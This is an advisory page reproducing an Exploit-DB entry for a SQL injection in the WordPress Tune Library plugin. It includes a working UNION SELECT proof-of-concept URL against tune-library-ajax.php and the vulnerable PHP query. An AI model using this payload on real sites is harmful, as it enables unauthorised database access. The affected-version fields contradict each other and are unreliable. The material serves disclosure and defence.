WordPress Tune Library plugin

vendor:

Tune Library plugin

by:

Miroslav Stampar

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Tune Library plugin

Affected Version From: 2.17

Affected Version To: 1.5.2001

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability

The WordPress Tune Library plugin version 2.17 and below is vulnerable to a SQL injection vulnerability. This vulnerability is due to the lack of proper sanitization of user-supplied input in the 'letter' parameter of the 'tune-library-ajax.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to gain access to sensitive information such as the version of the database, the current user, and the database name.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in database queries.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability
# Date: 2011-09-10
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/tune-library.zip
# Version: 1.5.1 (tested)
# Notes: magic_quotes has to be turned off
#        Plugin setting "Filter artists by letter and show alphabetical navigation" has to be turned on

---
PoC
---
http://www.site.com/wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20

---------------
Vulnerable code
---------------
$artistletter = $_GET['letter'];
...
if ($options['oneletter'] == false || $showallartists == true)
...
else
{
    if ($artistletter == '#')
    ...
    else
    {
        $querystr ="SELECT distinct artist, 'artist' as source FROM " . $wpdb->prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";
    }
}